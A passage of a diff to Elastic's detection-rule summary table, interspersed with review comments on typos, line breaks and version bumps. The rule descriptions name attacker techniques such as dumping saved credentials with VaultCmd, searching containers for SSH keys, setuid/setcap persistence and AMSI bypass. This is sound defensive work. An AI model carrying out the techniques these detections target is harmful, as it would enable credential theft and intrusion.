Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<scheduled-task-execution-at-scale-via-gpo, Scheduled Task Execution at Scale via GPO>> |Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |107 +|<<scheduled-task-execution-at-scale-via-gpo, Scheduled Task Execution at Scale via GPO>> |Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Lateral Movement], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |108 -|<<scheduled-tasks-at-command-enabled, Scheduled Tasks AT Command Enabled>> |Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<scheduled-tasks-at-command-enabled, Scheduled Tasks AT Command Enabled>> |Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<screensaver-plist-file-modified-by-unexpected-process, Screensaver Plist File Modified by Unexpected Process>> |Identifies when a screensaver plist file is modified by an unexpected process. 
An adversary can maintain persistence on a macOS endpoint by creating a malicious screensaver (.saver) file and configuring the screensaver plist file to execute code each time the screensaver is activated. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 
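Review bot: The title "SUID/SGUID Enumeration Detected" still reads "SGUID" while its own description correctly says "SGID"; the anchor `suid-sguid-enumeration-detected` carries the same typo, so fixing it means renaming the anchor and its references in the same change. This hunk also handles hard line breaks inside description cells inconsistently: the SUID row gains a line break after "running the program." while the "Scheduled Task Execution at Scale via GPO" row loses the one it had; pick one convention for generated cells. The unchanged "SUNBURST" context row also spells the vendor as "SolarWind's Orion" rather than "SolarWinds Orion".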
@@ -1450,21 +1502,21 @@ and their rule type is `machine_learning`. |<<searching-for-saved-credentials-via-vaultcmd, Searching for Saved Credentials via VaultCmd>> |Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<security-software-discovery-using-wmic, Security Software Discovery using WMIC>> |Identifies the use of Windows Management Instrumentation Command (WMIC) to discover certain System Security Settings such as AntiVirus or Host Firewall details. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |107 +|<<security-software-discovery-using-wmic, Security Software Discovery using WMIC>> |Identifies the use of Windows Management Instrumentation Command (WMIC) to discover certain System Security Settings such as AntiVirus or Host Firewall details. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |108 -|<<security-software-discovery-via-grep, Security Software Discovery via Grep>> |Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details. 
|[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<security-software-discovery-via-grep, Security Software Discovery via Grep>> |Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<sensitive-files-compression, Sensitive Files Compression>> |Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<sensitive-files-compression, Sensitive Files Compression>> |Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |206 |<<sensitive-files-compression-inside-a-container, Sensitive Files Compression Inside A Container>> |Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations inside a container. 
|[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access] |8.8.0 |2 |<<sensitive-keys-or-passwords-searched-for-inside-a-container, Sensitive Keys Or Passwords Searched For Inside A Container>> |This rule detects the use of system search utilities like grep and find to search for private SSH keys or passwords inside a container. Unauthorized access to these sensitive files could lead to further compromise of the container environment or facilitate a container breakout to the underlying host machine. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.8.0 |2 -|<<sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user, Sensitive Privilege SeEnableDelegationPrivilege assigned to a User>> |Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user right" to a user. The SeEnableDelegationPrivilege "user right" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |107 +|<<sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user, Sensitive Privilege SeEnableDelegationPrivilege assigned to a User>> |Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user right" to a user. The SeEnableDelegationPrivilege "user right" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |108 |<<service-command-lateral-movement, Service Command Lateral Movement>> |Identifies use of sc.exe to create, modify, or start services on remote hosts. This could be indicative of adversary lateral movement but will be noisy if commonly done by admins. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<service-control-spawned-via-script-interpreter, Service Control Spawned via Script Interpreter>> |Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<service-control-spawned-via-script-interpreter, Service Control Spawned via Script Interpreter>> |Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<service-creation-via-local-kerberos-authentication, Service Creation via Local Kerberos Authentication>> |Identifies a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, followed by a sevice creation from the same LogonId. 
This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined user to local System privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |105 
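Review bot: Several rows here bump the rule version with no visible change to description or tags ("Security Software Discovery using WMIC" 107 to 108, "Security Software Discovery via Grep" 105 to 106 where only a line break moved); that is fine if the underlying query changed, but the summary table cannot show it, so confirm the linked rule pages carry the actual change. The unchanged "Service Creation via Local Kerberos Authentication" context row has "sevice creation", which should be "service creation".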
@@ -1474,11 +1526,13 @@ and their rule type is `machine_learning`. |<<service-path-modification-via-sc-exe, Service Path Modification via sc.exe>> |Identifies attempts to modify a service path setting using sc.exe. Attackers may attempt to modify existing services for persistence or privilege escalation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<setcap-setuid-setgid-capability-set, Setcap setuid/setgid Capability Set>> |This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |1 + |<<setuid-setgid-bit-set-via-chmod, Setuid / Setgid Bit Set via chmod>> |An adversary may add the setuid or setgid bit to a file or directory in order to run a file with the privileges of the owning user or group. An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setuid or setgid bit to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future. 
|[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |103 |<<sharepoint-malware-file-upload, SharePoint Malware File Upload>> |Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement] |8.3.0 |102 -|<<shared-object-created-or-changed-by-previously-unknown-process, Shared Object Created or Changed by Previously Unknown Process>> |This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |3 +|<<shared-object-created-or-changed-by-previously-unknown-process, Shared Object Created or Changed by Previously Unknown Process>> |This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. 
While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |4 |<<shell-execution-via-apple-scripting, Shell Execution via Apple Scripting>> |Identifies the execution of the shell process (sh) via scripting (JXA or AppleScript). Adversaries may use the doShellScript functionality in JXA or do shell script in AppleScript to execute system commands. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |104 
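Review bot: The new "Setcap setuid/setgid Capability Set" row is again followed by an empty `+` line, unlike the surrounding rows; remove it for consistency with the rest of the table. The "Shared Object Created or Changed by Previously Unknown Process" row changes only by splitting its description across two lines and bumping the version from 3 to 4, so the same line-break question from earlier hunks applies. The unchanged "SharePoint Malware File Upload" context row has "occurence", which should be "occurrence".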
@@ -1488,9 +1542,13 @@ and their rule type is `machine_learning`. |<<softwareupdate-preferences-modification, SoftwareUpdate Preferences Modification>> |Identifies changes to the SoftwareUpdate preferences using the built-in defaults command. Adversaries may abuse this in an attempt to disable security updates. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<solarwinds-process-disabling-services-via-registry, SolarWinds Process Disabling Services via Registry>> |Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<solarwinds-process-disabling-services-via-registry, SolarWinds Process Disabling Services via Registry>> |Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 + +|<<spike-in-aws-error-messages, Spike in AWS Error Messages>> |A machine learning job detected a significant spike in the rate of a particular error in the CloudTrail messages. Spikes in error messages may accompany attempts at privilege escalation, lateral movement, or discovery. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 -|<<spike-in-aws-error-messages, Spike in AWS Error Messages>> |A machine learning job detected a significant spike in the rate of a particular error in the CloudTrail messages. 
Spikes in error messages may accompany attempts at privilege escalation, lateral movement, or discovery. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<spike-in-bytes-sent-to-an-external-device, Spike in Bytes Sent to an External Device>> |A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + +|<<spike-in-bytes-sent-to-an-external-device-via-airdrop, Spike in Bytes Sent to an External Device via Airdrop>> |A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 |<<spike-in-failed-logon-events, Spike in Failed Logon Events>> |A machine learning job found an unusually large spike in authentication failure events. This can be due to password spraying, user enumeration or brute force activity and may be a precursor to account takeover or credentialed access. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Credential Access], [Resources: Investigation Guide] |8.3.0 |104 
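Review bot: The blank `+` lines inserted around the ML rows make the diff show "Spike in AWS Error Messages" as a full delete plus add, hiding the one real change in that row (minimum stack 8.3.0 to 8.9.0, version 107 to 208); dropping the blank lines would make the hunk show that as an in-place edit. The two new "Spike in Bytes Sent to an External Device" rows and the moved AWS row all now require 8.9.0, so the updates description should list them as unavailable on older stacks.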
@@ -1512,7 +1570,7 @@ and their rule type is `machine_learning`. |<<spike-in-successful-logon-events-from-a-source-ip, Spike in Successful Logon Events from a Source IP>> |A machine learning job found an unusually large spike in successful authentication events from a particular source IP address. This can be due to password spraying, user enumeration or brute force activity. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Credential Access], [Tactic: Defense Evasion], [Resources: Investigation Guide] |8.3.0 |104 -|<<startup-folder-persistence-via-unsigned-process, Startup Folder Persistence via Unsigned Process>> |Identifies files written or modified in the startup folder by unsigned processes. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<startup-folder-persistence-via-unsigned-process, Startup Folder Persistence via Unsigned Process>> |Identifies files written or modified in the startup folder by unsigned processes. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<startup-persistence-by-a-suspicious-process, Startup Persistence by a Suspicious Process>> |Identifies files written to or modified in the startup folder by commonly abused processes. Adversaries may use this technique to maintain persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 
@@ -1522,17 +1580,17 @@ and their rule type is `machine_learning`. |<<sublime-plugin-or-application-script-modification, Sublime Plugin or Application Script Modification>> |Adversaries may create or modify the Sublime application plugins or scripts to execute a malicious payload each time the Sublime application is started. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<sudo-command-enumeration-detected, Sudo Command Enumeration Detected>> |This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |2 +|<<sudo-command-enumeration-detected, Sudo Command Enumeration Detected>> |This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |3 |<<sudo-heap-based-buffer-overflow-attempt, Sudo Heap-Based Buffer Overflow Attempt>> |Identifies the attempted use of a heap-based buffer overflow vulnerability for the Sudo binary in Unix-like systems (CVE-2021-3156). Successful exploitation allows an unprivileged user to escalate to the root user. 
|[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |103 -|<<sudoers-file-modification, Sudoers File Modification>> |A sudoers file specifies the commands that users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |103 +|<<sudoers-file-modification, Sudoers File Modification>> |A sudoers file specifies the commands that users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.6.0 |203 -|<<suspicious-net-code-compilation, Suspicious .NET Code Compilation>> |Identifies suspicious .NET code execution. connections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-net-code-compilation, Suspicious .NET Code Compilation>> |Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<suspicious-net-reflection-via-powershell, Suspicious .NET Reflection via PowerShell>> |Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. 
Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 +|<<suspicious-net-reflection-via-powershell, Suspicious .NET Reflection via PowerShell>> |Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |109 -|<<suspicious-activity-reported-by-okta-user, Suspicious Activity Reported by Okta User>> |Detects when a user reports suspicious activity for their Okta account. These events should be investigated, as they can help security teams identify when an adversary is attempting to gain access to their network. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Initial Access] |8.3.0 |104 +|<<suspicious-activity-reported-by-okta-user, Suspicious Activity Reported by Okta User>> |Detects when a user reports suspicious activity for their Okta account. These events should be investigated, as they can help security teams identify when an adversary is attempting to gain access to their network. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Initial Access] |8.10.0 |205 |<<suspicious-antimalware-scan-interface-dll, Suspicious Antimalware Scan Interface DLL>> |Identifies the creation of the Antimalware Scan Interface (AMSI) DLL in an unusual location. This may indicate an attempt to bypass AMSI by loading a rogue AMSI module instead of the legit one. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |6 
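Review bot: the Sudoers File Modification and Suspicious Activity Reported by Okta User rows raise the minimum stack column (8.3.0 to 8.6.0 and 8.3.0 to 8.10.0) with rule versions jumping by 100 rather than 1 (103 to 203, 104 to 205), which means stacks below those versions stop receiving updates for these two rules; the commit message only mentions link fixes and deprecations, so add a line about the min-stack bumps to the downloadable updates description so users on 8.3 through 8.9 can see why. The Suspicious .NET Code Compilation fix in the same hunk, replacing the truncated "Identifies suspicious .NET code execution. connections." with the full description, is correct and needs no change.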
@@ -1546,77 +1604,79 @@ and their rule type is `machine_learning`. |<<suspicious-child-process-of-adobe-acrobat-reader-update-service, Suspicious Child Process of Adobe Acrobat Reader Update Service>> |Detects attempts to exploit privilege escalation vulnerabilities related to the Adobe Acrobat Reader PrivilegedHelperTool responsible for installing updates. For more information, refer to CVE-2020-9615, CVE-2020-9614 and CVE-2020-9613 and verify that the impacted system is patched. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-cmd-execution-via-wmi, Suspicious Cmd Execution via WMI>> |Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-cmd-execution-via-wmi, Suspicious Cmd Execution via WMI>> |Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<suspicious-communication-app-child-process, Suspicious Communication App Child Process>> |Identifies suspicious child processes of communications apps, which can indicate a potential masquerading as the communication app or the exploitation of a vulnerability on the application causing it to execute code. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 +|<<suspicious-communication-app-child-process, Suspicious Communication App Child Process>> |Identifies suspicious child processes of communications apps, which can indicate a potential masquerading as the communication app or the exploitation of a vulnerability on the application causing it to execute code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<suspicious-content-extracted-or-decompressed-via-funzip, Suspicious Content Extracted or Decompressed via Funzip>> |Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the "-c" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. This behavior is consistent with malware families such as Bundlore. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<suspicious-content-extracted-or-decompressed-via-funzip, Suspicious Content Extracted or Decompressed via Funzip>> |Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the "-c" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. This behavior is consistent with malware families such as Bundlore. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 |<<suspicious-crontab-creation-or-modification, Suspicious CronTab Creation or Modification>> |Identifies attempts to create or modify a crontab via a process that is not crontab (i.e python, osascript, etc.). This activity should not be highly prevalent and could indicate the use of cron as a persistence mechanism by a threat actor. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-dll-loaded-for-persistence-or-privilege-escalation, Suspicious DLL Loaded for Persistence or Privilege Escalation>> |Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-dll-loaded-for-persistence-or-privilege-escalation, Suspicious DLL Loaded for Persistence or Privilege Escalation>> |Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<suspicious-data-encryption-via-openssl-utility, Suspicious Data Encryption via OpenSSL Utility>> |Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |2 +|<<suspicious-data-encryption-via-openssl-utility, Suspicious Data Encryption via OpenSSL Utility>> |Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |3 |<<suspicious-emond-child-process, Suspicious Emond Child Process>> |Identifies the execution of a suspicious child process of the Event Monitor Daemon (emond). Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-endpoint-security-parent-process, Suspicious Endpoint Security Parent Process>> |A suspicious Endpoint Security parent process was detected. 
This may indicate a process hollowing or other form of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-endpoint-security-parent-process, Suspicious Endpoint Security Parent Process>> |A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 + +|<<suspicious-execution-from-a-mounted-device, Suspicious Execution from a Mounted Device>> |Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |105 -|<<suspicious-execution-from-a-mounted-device, Suspicious Execution from a Mounted Device>> |Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 